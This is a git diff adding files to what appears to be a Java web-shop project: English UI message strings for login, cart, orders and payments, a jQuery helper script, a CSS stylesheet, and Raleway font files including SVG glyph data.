+login.remember.me=Remember me in this computer
+login.forgot.password=Forgot your password?
+
+send.email.title=Reset Your Password
+send.email.button=Send Email
+
+change.password.title=Change Password
+change.password.old.password=Old Password
+change.password.new.password=New Password
+change.password.button=Change Password
+change.password.success=Password changed successfully
+
+reset.password.title=Reset Your Password
+reset.password.new.password=New Password
+reset.password.button=Reset Password
+reset.password.success=Password updated successfully
+
+shopping.cart.title=Shopping Cart
+shopping.cart.empty=Your shopping cart is empty
+shopping.cart.buy=Buy Now!
+
+new.order.title=Complete Your Order
+order.title=Your Order
+order.send.address=Send to
+order.default.address=Send to your default address
+order.different.address=Send to another address
+order.address=Address
+order.date=Purchase Date
+order.total.price=Price
+order.buy.and.pay=Buy &amp; Pay Now!
+order.buy.and.pay.later=Buy &amp; Pay Later!
+order.pay.now=Pay Now!
+order.cancel=Cancel Order!
+order.name.single.product.autogenerated={0} ({1})
+order.name.autogenerated={0} ({1}) and {2} more products
+order.created=Your order ''{0}'' was created successfully
+orders.title=Your Orders
+orders.empty.table=You have no orders yet
+order.name=Order
+order.date=Date
+order.state=State
+order.price=Price
+order.pending=The payment is pending
+order.already.completed=This order is completed
+order.already.cancelled=This order was cancelled
+
+product.name=Name
+product.description=Description
+product.category=Category
+product.rating=Rating
+product.price=Price
+product.total.sales=Total sales
+product.add.to.cart=Add to Cart
+
+comment.title=New Review
+comment.date=Date
+comment.user=User
+comment.text=Review Details
+comment.rate=Rate this product
+comment.button=Add Review
+comment.text.validation=Review text can not be empty
+add.or.edit.comment.button=Rate
+product.comment.created=Product review added
+
+payment.title=Payment
+payment.default.card=Pay with your default credit card
+payment.different.card=Pay with another credit card
+payment.input.card.validation=The credit card number is invalid
+payment.input.cvv.validation=The CVV number is invalid
+payment.input.expiration.month.validation=Select the card expiration month
+payment.input.expiration.year.validation=Select the card expiration year
+payment.pay.button=Pay Now!
+payment.set.as.default.card=Save as your default credit card
+payment.cvv=CVV
+payment.expiration.month=Expiration Month
+payment.expiration.year=Expiration Year
+
+mail.template=<html>{0}, click <a href="{1}">here</a> to reset your password</html>
+mail.html.not.supported=Your email client does not support HTML messages
+mail.subject=Password Reset for {0}
+
+error.title=Internal Error
+error.page=Page:
+error.time=Time:
+error.status=Response Status:
+error.cause=Cause:
+
+confirm.title=Confirm
+confirm.yes=Yes
+confirm.no=No
+confirm.remove.profile.image=Remove your profile image?
+confirm.remove.product.from.cart=Remove product from cart?
+confirm.cancel.order=Cancel order?
+
+year.select=--Select Year--
+month.select=--Select Month--
+month.1=January
+month.2=February
+month.3=March
+month.4=April
+month.5=May
+month.6=June
+month.7=July
+month.8=August
+month.9=September
+month.10=October
+month.11=November
+month.12=December
+
+# Java messages and errors
+
+auth.invalid.user=The password may be incorrect
+auth.invalid.password=The password may be incorrect
+auth.invalid.token=Invalid token for user {0}
+registration.invalid.parameters=Invalid values detected in the registration form
+update.profile.invalid.parameters=Invalid values detected in the user profile
+login.invalid.parameters=Invalid values detected in the login form
+change.password.invalid.parameters=Invalid values detected
+reset.password.invalid.parameters=Invalid values detected
+instance.not.found.exception=The {0} with identifier ''{1}'' not found
+duplicated.instance.exception=The {0} ''{1}'' is already in use
+duplicated.comment.exception=The user {0} already rated the product ''{1}''
+invalid.profile.image=Unable to read profile image
+product.already.in.cart=The product ''{0}'' is already in the shopping cart
+product.not.in.cart=The product ''{0}'' is not in the shopping cart
+product.added.to.the.cart=The product ''{0}'' added to the shopping cart
+product.removed.from.the.cart=The product ''{0}'' removed from the shopping cart
+create.order.invalid.parameters=Invalid values detected in the order parameters
+invalid.state=The requested operation can not be executed due to inconsistencies in the state of the selected resources
+pay.order.invalid.parameter=Invalid values detected in the payment form
+cancel.order.invalid.parameter=Invalid values detected in the payment form
+order.payment.completed=Payment completed successfully
+order.cancellation.completed=Order cancelled successfully
+invalid.email=Email address is invalid
+mail.sent.success=Email successfully sent to {0}
+mail.not.configured=Email server (SMTP) is not properly configured
\ No newline at end of file
diff --git a/src/main/resources/static/Scripts.js b/src/main/resources/static/Scripts.js
new file mode 100644
index 0000000..9b1b7c9
--- /dev/null
+++ b/src/main/resources/static/Scripts.js
@@ -0,0 +1,62 @@
+var DEFAULT_CONFIRM_MESSAGE = "Confirm?";
+
+/**
+ * 
+ * @param {type} message
+ * @param {type} f
+ */
+function doConfirm(message, f) {
+    var $div = $('<div>');
+    $div.append($('#modal-fragment').html());
+    $div.find('.modal-body p').text(message);
+    $('body').append($div);
+    $div.find('.modal').modal('show').on('hidden.bs.modal', function () {
+        $div.remove();
+    });
+    $div.find('.modal').find('.btn-primary').click(function(e) {
+        e.preventDefault();
+        f();
+        $div.find('.modal').modal('hide');
+    });
+}
+
+/**
+ * 
+ * @param {type} displayOnly
+ * @param {type} size
+ */
+function doCreateRatings(displayOnly, size) {
+    $('input.rating-loading').rating({
+        displayOnly: displayOnly,
+        size: size,
+        step: displayOnly ? 0.5 : 1,
+        emptyStar: '<i class="far fa-star text-success"></i>',
+        filledStar: '<i class="fas fa-star text-success"></i>',
+        showClear: false,
+        showCaption: false
+    });
+}
+
+/**
+ * 
+ */
+function doConfigureFormValidation() {
+    $.validate({
+        modules: 'security',
+        validateOnBlur: false,
+        onElementValidate: function (valid, $el) {
+            if (valid) {
+                $($el.data('validation-error-msg-container')).closest('.form-group').addClass('d-none');
+            } else {
+                $($el.data('validation-error-msg-container')).closest('.form-group').removeClass('d-none');
+            }
+        }
+    });
+}
+
+/**
+ * 
+ */
+function doConfigureInputMasking() {
+    $('[data-inputmask]').inputmask();
+}
\ No newline at end of file
diff --git a/src/main/resources/static/Styles.css b/src/main/resources/static/Styles.css
new file mode 100644
index 0000000..11e7268
--- /dev/null
+++ b/src/main/resources/static/Styles.css
@@ -0,0 +1,192 @@
+@font-face {
+    font-family: 'Raleway';
+    font-style: normal;
+    font-weight: 400;
+    src: url('/fonts/raleway-v12-latin-regular.eot'); /* IE9 Compat Modes */
+    src: local('Raleway'), local('Raleway-Regular'),
+        url('/fonts/raleway-v12-latin-regular.woff2') format('woff2'), /* Super Modern Browsers */
+        url('/fonts/raleway-v12-latin-regular.eot?#iefix') format('embedded-opentype'), /* IE6-IE8 */
+        url('/fonts/raleway-v12-latin-regular.woff') format('woff'), /* Modern Browsers */
+        url('/fonts/raleway-v12-latin-regular.ttf') format('truetype'), /* Safari, Android, iOS */
+        url('/fonts/raleway-v12-latin-regular.svg#Raleway') format('svg'); /* Legacy iOS */
+}
+
+.ui-helper-margin-top {
+    margin-top: 10px;
+}
+
+.ui-helper-margin-bottom {
+    margin-bottom: 10px;
+}
+
+.ui-helper-margin-top-decrease {
+    margin-top: -10px;
+}
+
+.ui-helper-margin-bottom-decrease {
+    margin-bottom: -10px;
+}
+
+body {
+    font-family: 'Raleway', Verdana;
+    font-size: 14px;
+    padding-top: 90px;
+    padding-bottom: 75px;
+}
+
+.navbar-brand {
+    font-size: 16px;
+}
+
+@media (max-width: 768px) {
+    .truncate {
+        overflow: hidden;
+        white-space: nowrap;
+        text-overflow: ellipsis;
+    }
+    label {
+        overflow: hidden;
+        white-space: nowrap;
+        text-overflow: ellipsis;
+    }
+}
+
+@media (max-width: 1200px) {
+    .desktop-only {
+        display: none;
+    }
+}
+
+@media (max-width: 992px) {
+}
+
+body .navbar {
+    font-size: 16px;
+}
+
+.nav-item .text-muted {
+    display: inline-block;
+    padding-top: 24px;
+    margin-right: 25px;
+    line-height: inherit;
+    white-space: nowrap;
+}
+
+.nav-item .text-muted img {
+    margin-top: -7px;
+}
+
+.nav-item .text-muted svg {
+    margin-top: -7px;
+}
+
+::-webkit-input-placeholder { 
+    font-family: 'Raleway', Verdana;
+    font-size: 14px;
+}
+
+::-moz-placeholder { 
+    font-family: 'Raleway', Verdana;
+    font-size: 14px;
+} /* firefox 19+ */
+
+:-ms-input-placeholder { 
+    font-family: 'Raleway', Verdana;
+    font-size: 14px;
+} /* ie */
+
+
+input:-moz-placeholder { 
+    font-family: 'Raleway', Verdana;
+    font-size: 14px;
+}
+
+.navbar-collapse {
+    text-align: center;
+}
+
+.footer {
+    position: fixed;
+    bottom: 0;
+    width: 100%;
+    height: 60px;
+    line-height: 60px;
+    z-index: 500;
+}
+
+body > .container {
+    padding-top: 20px;
+    padding-bottom: 20px;
+    margin: auto;
+    text-align: center;
+    align-items: center;
+}
+
+.col-padding {
+    padding-left: 30px;
+    padding-right: 30px;
+}
+
+.home .card {
+    margin: 0 auto;
+    float: none;
+    margin-bottom: 10px;
+    min-height: calc(50vh - 120px);
+    max-height: calc(50vh - 120px);
+    overflow: hidden;
+}
+
+.vh-100 {
+    height: calc(100vh - 190px);
+}
+
+.home .card > a {
+    cursor: pointer;
+    padding-top: 10px;
+    text-decoration: none;
+}
+
+.home .card:hover {
+    box-shadow: 0 4px 12px 0 rgba(0,0,0,0.2);
+}
+
+.form-group > label {
+    font-weight: bold;
+}
+
+.form-title {
+    margin-bottom: 10px;
+}
+
+.input-label-middle {
+    padding-top: 10px;
+}
+
+.input-label-middle-rating {
+    padding-top: 25px;
+}
+
+.star > svg {
+    cursor: pointer;
+}
+
+table.dataTable {
+    border-collapse: collapse !important;
+}
+
+.rating-stars, .star {
+    cursor: default !important;
+}
+.filter-label {
+    margin-top: 8px;
+}
+
+.form-check-label {
+    cursor: pointer;
+    margin-left: 20px;
+}
+
+.form-check-label input {
+    cursor: pointer;
+}
+
diff --git a/src/main/resources/static/fonts/raleway-v12-latin-regular.eot b/src/main/resources/static/fonts/raleway-v12-latin-regular.eot
new file mode 100644
index 0000000..dc8a2ba
Binary files /dev/null and b/src/main/resources/static/fonts/raleway-v12-latin-regular.eot differ
diff --git a/src/main/resources/static/fonts/raleway-v12-latin-regular.svg b/src/main/resources/static/fonts/raleway-v12-latin-regular.svg
new file mode 100644
index 0000000..3587070
--- /dev/null
+++ b/src/main/resources/static/fonts/raleway-v12-latin-regular.svg
@@ -0,0 +1,347 @@
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg xmlns="http://www.w3.org/2000/svg">
+<defs >
+<font id="Raleway" horiz-adv-x="464" ><font-face
+    font-family="Raleway"
+    units-per-em="1000"
+    panose-1="2 11 5 3 3 1 1 6 0 3"
+    ascent="940"
+    descent="-234"
+    alphabetic="0" />
+<glyph unicode=" " glyph-name="space" horiz-adv-x="255" />
+<glyph unicode="!" glyph-name="exclam" horiz-adv-x="252" d="M92 228V717H160V228H92ZM92 0V112H160V0H92Z" />
+<glyph unicode="&quot;" glyph-name="quotedbl" horiz-adv-x="292" d="M69 522V716H128V522H69ZM164 522V716H223V522H164Z" />
+<glyph unicode="#" glyph-name="numbersign" horiz-adv-x="680" d="M642 457H513L466 261H600V207H453L403 0H345L396 207H207L157 0H99L150 207H37V261H163L210 457H80V508H223L272 710H330L280 508H469L518 710H576L526 508H642V457ZM409 261L456 457H267L220 261H409Z" />
+<glyph unicode="$" glyph-name="dollar" horiz-adv-x="619" d="M510 577Q481 609 434 630T326 653V386Q328 386 329 386T333 385Q390 373 435 358T513 321T562 266T579 186Q579 138 561 102T509 43T431 7T331 -6V-103H294V-5Q148 2 38 97L73 154Q108 116 166 89T297
+57V324L291 326Q235 339 193 353T122 388T79 438T64 511Q64 558 81 594T128 656T200 696T294 714V815H331V715Q397 713 449 692T544 633L510 577ZM505 179Q505 209 494 230T460 267T404 295T326 318V56Q411 56 458 86T505 179ZM136 521Q136 492 145 473T174 439T224
+414T297 393V652Q212 648 174 613T136 521Z" />
+<glyph unicode="%" glyph-name="percent" horiz-adv-x="714" d="M190 433Q159 433 132 444T84 474T52 520T40 576Q40 606 52 632T84 677T131 708T190 720Q221 720 248 709T295 678T327 632T339 576Q339 546 328 520T296 475T248 444T190 433ZM190 472Q210 472
+228 480T259 503T280 536T288 576Q288 598 280 617T259 650T227 672T190 680Q169 680 151 672T120 649T99 616T91 576Q91 555 99 536T120 503T152 480T190 472ZM525 -10Q494 -10 467 1T420 31T388 77T376 134Q376 164 387 190T419 235T467 266T525 277Q556 277
+583 266T631 236T663 190T675 134Q675 104 663 78T631 32T584 1T525 -10ZM525 30Q546 30 563 38T594 61T615 94T623 134Q623 155 615 174T594 207T562 230T525 238Q505 238 487 230T456 207T435 174T427 134Q427 112 435 93T456 60T487 38T525 30ZM65 27L344 367L616
+714L651 684L372 344L99 -4L65 27Z" />
+<glyph unicode="&amp;" glyph-name="ampersand" horiz-adv-x="667" d="M571 0L489 86Q447 41 393 16T274 -10Q227 -10 186 4T114 43T65 104T47 183Q47 219 59 249T92 304T140 352T197 394Q170 423 152 446T122 488T105 526T100 563Q100 596 113 624T151 674T207
+707T278 719Q313 719 343 709T395 681T431 636T444 579Q444 548 432 523T398 474T349 430T289 388L488 180Q508 218 519 262T531 356H589Q588 294 573 239T528 138L661 0H571ZM281 45Q332 45 375 66T451 126L236 353Q183 316 148 276T113 181Q113 148 127 123T166
+80T220 54T281 45ZM163 565Q163 553 166 541T180 514T206 478T250 429Q308 467 344 500T381 577Q381 616 352 641T278 666Q253 666 232 658T196 636T172 604T163 565Z" />
+<glyph unicode="&apos;" glyph-name="quotesingle" horiz-adv-x="197" d="M69 521V716H128V521H69Z" />
+<glyph unicode="(" glyph-name="parenleft" horiz-adv-x="269" d="M44 346Q44 397 55 446T85 544T129 641T184 739L236 714Q216 684 194 640T152 546T121 444T108 343Q108 265 142 173T235 -10L184 -37Q121 57 83 153T44 346Z" />
+<glyph unicode=")" glyph-name="parenright" horiz-adv-x="268" d="M224 346Q224 250 186 154T84 -37L34 -10Q63 35 86 81T126 172T152 261T161 343Q161 391 149 443T117 546T76 640T32 714L85 739Q114 690 139 642T183 545T213 447T224 346Z" />
+<glyph unicode="*" glyph-name="asterisk" horiz-adv-x="321" d="M87 546L130 608L62 630L73 666L142 640V713H179V640L248 666L259 630L191 608L235 546L203 524L161 589L118 524L87 546Z" />
+<glyph unicode="+" glyph-name="plus" horiz-adv-x="415" d="M363 383V327H239V192H176V327H52V383H176V518H239V383H363Z" />
+<glyph unicode="," glyph-name="comma" horiz-adv-x="225" d="M86 -81L103 3H80V98H146V3L121 -81H86Z" />
+<glyph unicode="-" glyph-name="hyphen" horiz-adv-x="422" d="M65 241V304H357V241H65Z" />
+<glyph unicode="." glyph-name="period" horiz-adv-x="189" d="M65 0V98H124V0H65Z" />
+<glyph unicode="/" glyph-name="slash" horiz-adv-x="604" d="M576 710L104 0H27L499 710H576Z" />
+<glyph unicode="0" glyph-name="zero" horiz-adv-x="612" d="M557 293Q557 227 538 172T486 76T406 13T306 -10Q252 -10 206 12T127 75T74 171T55 293Q55 359 74 414T126 510T206 574T306 597Q360 597 406 574T485 511T538 415T557 293ZM488 293Q488 347 475 391T437
+466T380 515T306 533Q265 533 232 516T174 467T137 391T123 293Q123 239 136 195T174 120T231 71T306 54Q346 54 379 71T437 119T474 195T488 293Z" />
+<glyph unicode="1" glyph-name="one" horiz-adv-x="428" d="M406 62V0H67V62H209V490Q201 478 182 464T139 438T90 418T46 410V476Q69 476 96 489T148 519T190 551T209 571H279V62H406Z" />
+<glyph unicode="2" glyph-name="two" horiz-adv-x="521" d="M44 0Q44 34 50 68T73 137T123 202T210 262Q239 277 270 291T328 324T372 364T389 417Q389 436 381 454T356 487T315 511T257 520Q224 520 198 511T153 488T119 461T98 437L53 486Q59 492 76 508T120
+540T185 568T268 581Q314 581 350 569T411 534T449 484T462 424Q462 383 444 353T400 301T343 264T289 237Q257 223 227 206T172 167T133 120T117 62H473V0H44Z" />
+<glyph unicode="3" glyph-name="three" horiz-adv-x="534" d="M343 236Q409 225 448 176T488 55Q488 10 472 -27T425 -91T352 -132T257 -147Q181 -147 124 -117T38 -32L85 11Q106 -33 149 -59T257 -85Q332 -85 375 -49T418 56Q418 125 373 165T243 205H218V263H245Q322
+263 363 298T404 391Q404 421 393 444T363 482T317 506T259 514Q202 514 159 489T93 418L49 460Q61 486 83 507T133 544T195 567T265 576Q311 576 349 563T416 527T459 470T475 397Q475 367 466 340T440 291T399 255T343 236Z" />
+<glyph unicode="4" glyph-name="four" horiz-adv-x="546" d="M356 -127V51H23V111L378 571H424V113H512V51H424V-127H356ZM95 113H363V464L95 113Z" />
+<glyph unicode="5" glyph-name="five" horiz-adv-x="545" d="M277 312Q326 312 368 296T441 249T491 178T509 86Q509 33 490 -10T437 -84T358 -132T262 -149Q224 -149 190 -140T126 -112T74 -69T35 -13L80 21Q108 -28 156 -58T263 -88Q300 -88 332 -76T388 -40T425
+15T439 85Q439 122 426 152T390 205T336 239T269 251Q222 251 181 231T113 171H50Q51 177 55 198T65 248T78 312T92 384Q109 468 129 571H472V508H180L131 253Q157 281 194 296T277 312Z" />
+<glyph unicode="6" glyph-name="six" horiz-adv-x="603" d="M559 234Q559 183 540 139T486 61T406 9T307 -10Q251 -10 204 10T124 69T71 162T52 287Q52 395 71 475T124 609T207 689T314 715Q385 715 441 680T526 583L482 543Q461 594 416 624T314 655Q270 655
+234 634T173 574T133 476T118 345Q140 404 193 439T315 474Q366 474 410 456T488 405T540 328T559 234ZM309 50Q347 50 380 64T439 104T479 162T494 234Q494 272 479 305T439 364T380 403T308 418Q270 418 237 404T178 364T138 306T123 234Q123 196 138 163T178
+105T237 65T309 50Z" />
+<glyph unicode="7" glyph-name="seven" horiz-adv-x="535" d="M417 520H34V583H525L166 -127H88L417 520Z" />
+<glyph unicode="8" glyph-name="eight" horiz-adv-x="593" d="M543 197Q543 150 523 113T469 48T390 7T294 -8Q241 -8 196 8T119 53T68 120T50 201Q50 235 62 264T95 315T140 354T192 380Q168 390 147 404T110 438T85 480T75 529Q75 573 95 606T146 663T217 698T297
+710Q337 710 376 698T447 664T499 607T519 530Q519 504 510 481T484 439T446 405T400 380Q429 370 455 353T500 312T531 260T543 197ZM474 202Q474 238 458 265T416 312T358 341T295 351Q262 351 231 341T175 311T135 263T120 201Q120 166 136 139T177 92T234 63T298
+53Q330 53 361 63T418 93T458 140T474 202ZM143 526Q143 497 157 475T193 437T242 413T296 405Q323 405 350 413T399 437T436 476T450 528Q450 556 437 578T403 616T353 640T295 648Q266 648 239 640T190 616T156 577T143 526Z" />
+<glyph unicode="9" glyph-name="nine" horiz-adv-x="586" d="M36 327Q36 378 55 422T109 500T189 552T288 571Q344 571 391 551T471 492T524 399T543 274Q543 166 524 86T471 -48T388 -128T281 -154Q211 -154 155 -119T69 -22L113 18Q134 -33 179 -63T281 -94Q325
+-94 361 -73T423 -13T463 84T478 216Q455 157 402 122T280 87Q229 87 185 105T107 156T55 233T36 327ZM287 511Q249 511 216 497T157 457T116 399T101 327Q101 289 116 256T156 197T215 158T287 143Q325 143 359 157T418 197T457 255T472 327Q472 364 458 397T418
+456T359 496T287 511Z" />
+<glyph unicode=":" glyph-name="colon" horiz-adv-x="188" d="M65 420V518H123V420H65ZM65 0V98H123V0H65Z" />
+<glyph unicode=";" glyph-name="semicolon" horiz-adv-x="205" d="M70 420V518H128V420H70ZM76 -81L93 3H70V98H136V3L111 -81H76Z" />
+<glyph unicode="&lt;" glyph-name="less" horiz-adv-x="508" d="M33 276L452 528V455L132 259L452 64V-11L33 239V276Z" />
+<glyph unicode="=" glyph-name="equal" horiz-adv-x="438" d="M68 194V243H370V194H68ZM68 309V358H370V309H68Z" />
+<glyph unicode="&gt;" glyph-name="greater" horiz-adv-x="508" d="M474 239L55 -11V64L375 259L55 455V528L474 276V239Z" />
+<glyph unicode="?" glyph-name="question" horiz-adv-x="476" d="M154 202Q154 268 174 307T239 372Q259 384 283 396T328 427T363 470T378 532Q378 565 367 589T336 629T293 654T242 662Q188 662 146 633T81 560L34 590Q48 621 70 645T119 685T178 710T243 719Q280
+719 315 708T377 672T421 612T438 528Q438 488 427 461T396 413T353 379T303 350Q285 340 269 330T240 303T220 262T212 202H154ZM155 0V107H214V0H155Z" />
+<glyph unicode="@" glyph-name="at" horiz-adv-x="837" d="M417 603Q491 603 557 576T673 498T752 377T781 222Q781 208 780 185T773 135T759 82T733 33T693 -2T635 -16Q610 -16 595 -9T570 12T557 41T551 76Q523 47 479 26T382 5Q311 5 272 42T232 139Q232 177
+248 203T291 244T351 266T417 273Q461 273 494 265T544 250Q544 286 539 315T519 366T481 399T420 411Q381 411 345 399T280 364L262 403Q298 427 338 441T426 455Q481 455 513 437T563 389T584 323T589 250V121Q589 99 590 81T597 49T613 29T641 21Q672 21 692
+42T724 95T740 161T745 224Q745 296 720 359T651 468T546 542T416 569Q348 569 288 544T182 473T110 366T83 230Q83 159 108 97T176 -12T280 -85T411 -112Q454 -112 490 -102T564 -74L577 -106Q536 -126 494 -136T410 -146Q335 -146 269 -118T154 -40T76 80T47
+230Q47 315 77 383T159 501T278 576T417 603ZM478 70Q520 90 531 117T543 172V212Q530 214 497 224T415 234Q389 234 364 230T320 214T290 186T278 141Q278 99 308 74T385 48Q410 48 434 54T478 70Z" />
+<glyph unicode="A" glyph-name="A" horiz-adv-x="676" d="M309 710H368L663 0H589L497 222H178L87 0H12L309 710ZM481 277L338 628L193 277H481Z" />
+<glyph unicode="B" glyph-name="B" horiz-adv-x="666" d="M623 183Q623 143 607 110T564 52T501 14T424 0H89V710H431Q468 710 498 694T549 653T581 595T593 529Q593 475 566 431T491 364Q552 346 587 297T623 183ZM553 195Q553 221 544 245T519 288T480 318T431
+330H159V61H424Q451 61 474 72T515 101T543 144T553 195ZM159 649V387H403Q429 387 451 398T490 427T515 468T524 518Q524 545 516 569T492 610T455 638T409 649H159Z" />
+<glyph unicode="C" glyph-name="C" horiz-adv-x="686" d="M42 360Q42 424 64 487T130 601T236 682T379 714Q474 714 541 671T641 559L586 525Q569 560 545 584T492 623T434 644T375 651Q311 651 262 625T180 557T129 463T112 356Q112 297 132 243T188 148T272
+82T378 57Q408 57 439 64T500 88T555 129T597 189L655 159Q638 119 607 89T538 37T458 5T374 -6Q301 -6 240 26T135 109T67 226T42 360Z" />
+<glyph unicode="D" glyph-name="D" horiz-adv-x="715" d="M89 0V710H330Q415 710 478 682T584 606T648 494T670 356Q670 275 646 210T578 98T471 26T330 0H89ZM600 356Q600 420 582 473T530 566T445 626T330 648H159V62H330Q396 62 446 84T531 146T582 239T600 356Z" />
+<glyph unicode="E" glyph-name="E" horiz-adv-x="609" d="M566 62V0H89V710H557V648H159V392H506V333H159V62H566Z" />
+<glyph unicode="F" glyph-name="F" horiz-adv-x="589" d="M89 0V710H555V648H159V387H493V329H159V0H89Z" />
+<glyph unicode="G" glyph-name="G" horiz-adv-x="716" d="M602 104Q503 -5 374 -5Q302 -5 242 26T137 108T67 223T42 356Q42 427 66 492T135 606T239 685T370 715Q422 715 465 704T541 672T599 623T641 560L587 524Q552 590 496 621T369 652Q310 652 263 627T182
+561T130 466T112 355Q112 295 132 241T189 147T273 82T379 58Q440 58 495 86T602 177V295H444V349H661V0H602V104Z" />
+<glyph unicode="H" glyph-name="H" horiz-adv-x="738" d="M649 710V0H580V332H159V0H89V710H159V394H580V710H649Z" />
+<glyph unicode="I" glyph-name="I" horiz-adv-x="248" d="M89 0V710H159V0H89Z" />
+<glyph unicode="J" glyph-name="J" horiz-adv-x="481" d="M34 89Q56 74 90 63T168 52Q222 52 254 71T304 129T326 222T331 349V710H401V349Q401 268 394 202T362 88T292 15T168 -11Q78 -11 14 33L34 89Z" />
+<glyph unicode="K" glyph-name="K" horiz-adv-x="643" d="M89 0V709H159V297L550 710H627L337 398L642 0H565L293 357L159 218V0H89Z" />
+<glyph unicode="L" glyph-name="L" horiz-adv-x="583" d="M89 0V710H159V62H569V0H89Z" />
+<glyph unicode="M" glyph-name="M" horiz-adv-x="877" d="M718 0V583L459 132H418L159 583V0H89V710H161L438 224L717 710H788V0H718Z" />
+<glyph unicode="N" glyph-name="N" horiz-adv-x="772" d="M159 580V0H89V710H143L613 119V709H683V0H622L159 580Z" />
+<glyph unicode="O" glyph-name="O" horiz-adv-x="751" d="M375 -5Q301 -5 240 25T134 106T66 222T42 355Q42 426 67 491T138 606T244 685T376 715Q450 715 511 684T616 601T684 486T708 354Q708 283 683 218T613 104T507 25T375 -5ZM112 355Q112 297 131 244T185
+149T268 83T375 58Q435 58 484 84T567 152T619 247T638 355Q638 413 619 466T564 561T481 626T375 651Q315 651 266 626T183 558T131 463T112 355Z" />
+<glyph unicode="P" glyph-name="P" horiz-adv-x="622" d="M89 0V710H383Q429 710 467 691T534 640T578 568T594 487Q594 443 579 403T537 331T473 281T389 262H159V0H89ZM159 324H386Q417 324 442 337T486 373T514 425T524 487Q524 520 513 549T482 601T436 635T380
+648H159V324Z" />
+<glyph unicode="Q" glyph-name="Q" horiz-adv-x="749" d="M569 63Q528 31 480 13T375 -5Q301 -5 240 26T134 107T66 222T42 355Q42 426 67 491T138 606T244 685T376 715Q450 715 511 684T616 601T684 486T708 354Q708 281 682 215T608 99L692 0H623L569 63ZM375
+58Q420 58 458 72T528 112L439 218H508L565 150Q600 192 619 245T638 355Q638 413 619 466T564 561T481 627T375 652Q315 652 266 627T183 559T131 464T112 355Q112 297 131 244T185 149T268 83T375 58Z" />
+<glyph unicode="R" glyph-name="R" horiz-adv-x="653" d="M89 0V710H389Q435 710 473 691T540 640T583 568T599 487Q599 448 588 413T556 349T506 301T441 274L615 0H536L369 262H159V0H89ZM159 324H391Q422 324 447 337T491 374T519 426T529 487Q529 519 518
+548T487 600T441 635T385 648H159V324Z" />
+<glyph unicode="S" glyph-name="S" horiz-adv-x="607" d="M504 577Q474 611 424 632T310 653Q216 653 173 618T130 521Q130 489 141 469T177 433T238 407T327 385Q384 373 429 358T507 321T556 266T573 186Q573 137 554 101T501 41T420 6T317 -6Q152 -6 32 97L67
+154Q86 134 112 116T171 85T241 64T319 56Q404 56 451 86T499 179Q499 212 486 234T445 273T378 302T285 326Q229 339 187 353T116 388T73 438T58 511Q58 560 76 598T129 662T209 701T311 715Q382 715 437 694T538 633L504 577Z" />
+<glyph unicode="T" glyph-name="T" horiz-adv-x="610" d="M593 648H340V0H270V648H17V710H593V648Z" />
+<glyph unicode="U" glyph-name="U" horiz-adv-x="755" d="M377 58Q444 58 488 83T559 150T596 245T607 352V710H677V352Q677 280 661 216T610 102T517 24T378 -5Q294 -5 237 25T144 106T94 220T79 352V710H148V352Q148 296 159 243T196 149T267 83T377 58Z" />
+<glyph unicode="V" glyph-name="V" horiz-adv-x="679" d="M86 710L340 87L593 710H666L370 0H309L13 710H86Z" />
+<glyph unicode="W" glyph-name="W" horiz-adv-x="1046" d="M356 705H422L522 453L623 705H690L566 402L702 81L959 710H1035L734 0H672L523 351L373 0H312L12 710H87L345 81L480 402L356 705Z" />
+<glyph unicode="X" glyph-name="X" horiz-adv-x="632" d="M84 710L317 400L550 710H627L354 350L619 0H542L317 300L92 0H13L278 350L5 710H84Z" />
+<glyph unicode="Y" glyph-name="Y" horiz-adv-x="651" d="M93 710L325 328L559 710H635L360 264V0H290V266L16 710H93Z" />
+<glyph unicode="Z" glyph-name="Z" horiz-adv-x="629" d="M31 55L514 648H39V710H595V655L118 62H594V0H31V55Z" />
+<glyph unicode="[" glyph-name="bracketleft" horiz-adv-x="258" d="M88 -40V740H207V683H152V17H207V-40H88Z" />
+<glyph unicode="\" glyph-name="backslash" horiz-adv-x="568" d="M105 710L540 0H464L28 710H105Z" />
+<glyph unicode="]" glyph-name="bracketright" horiz-adv-x="258" d="M50 -40V17H106V683H50V740H170V-40H50Z" />
+<glyph unicode="^" glyph-name="asciicircum" horiz-adv-x="539" d="M43 303L241 710H299L496 303H436L270 646L101 303H43Z" />
+<glyph unicode="_" glyph-name="underscore" horiz-adv-x="511" d="M65 -62V0H446V-62H65Z" />
+<glyph unicode="`" glyph-name="grave" horiz-adv-x="222" d="M49 730H120L180 637L136 620L49 730Z" />
+<glyph unicode="a" glyph-name="a" horiz-adv-x="545" d="M206 -10Q169 -10 138 2T83 37T46 88T33 152Q33 186 49 215T94 265T163 297T251 309Q291 309 332 302T405 282V329Q405 398 366 438T258 479Q218 479 176 463T91 417L67 462Q168 530 263 530Q361 530 417
+475T473 323V88Q473 60 498 60V0Q481 -3 472 -3Q446 -3 432 10T416 46L414 87Q378 40 324 15T206 -10ZM222 42Q275 42 319 62T387 115Q396 124 400 134T405 154V239Q371 252 335 259T260 266Q188 266 143 236T98 157Q98 133 107 112T133 76T173 51T222 42Z" />
+<glyph unicode="b" glyph-name="b" horiz-adv-x="617" d="M330 -10Q268 -10 217 21T136 101V0H75V730H143V412Q178 465 227 497T341 530Q396 530 439 507T513 446T560 359T577 259Q577 204 558 155T506 70T428 12T330 -10ZM314 50Q357 50 392 67T453 114T493 181T508
+259Q508 300 495 338T457 405T398 452T322 470Q291 470 264 460T214 431T173 390T143 340V178Q147 151 164 128T206 87T259 60T314 50Z" />
+<glyph unicode="c" glyph-name="c" horiz-adv-x="549" d="M39 262Q39 317 58 366T111 451T194 509T300 530Q374 530 429 497T512 406L446 385Q424 425 385 447T297 470Q257 470 223 454T163 411T123 345T108 262Q108 218 123 179T164 112T224 67T298 50Q323 50
+347 57T393 76T429 105T450 139L517 119Q506 91 485 68T436 27T373 0T301 -10Q244 -10 196 11T113 70T59 157T39 262Z" />
+<glyph unicode="d" glyph-name="d" horiz-adv-x="622" d="M289 -10Q235 -10 189 12T110 72T59 157T40 259Q40 314 58 363T107 450T182 508T278 530Q344 530 395 496T475 412V730H543V88Q543 60 567 60V0Q552 -3 543 -3Q519 -3 501 12T483 50V101Q452 50 399 20T289
+-10ZM304 50Q329 50 357 60T411 87T453 128T475 179V340Q465 367 446 390T403 432T350 460T295 470Q253 470 219 452T161 405T123 337T110 259Q110 217 125 179T166 113T227 67T304 50Z" />
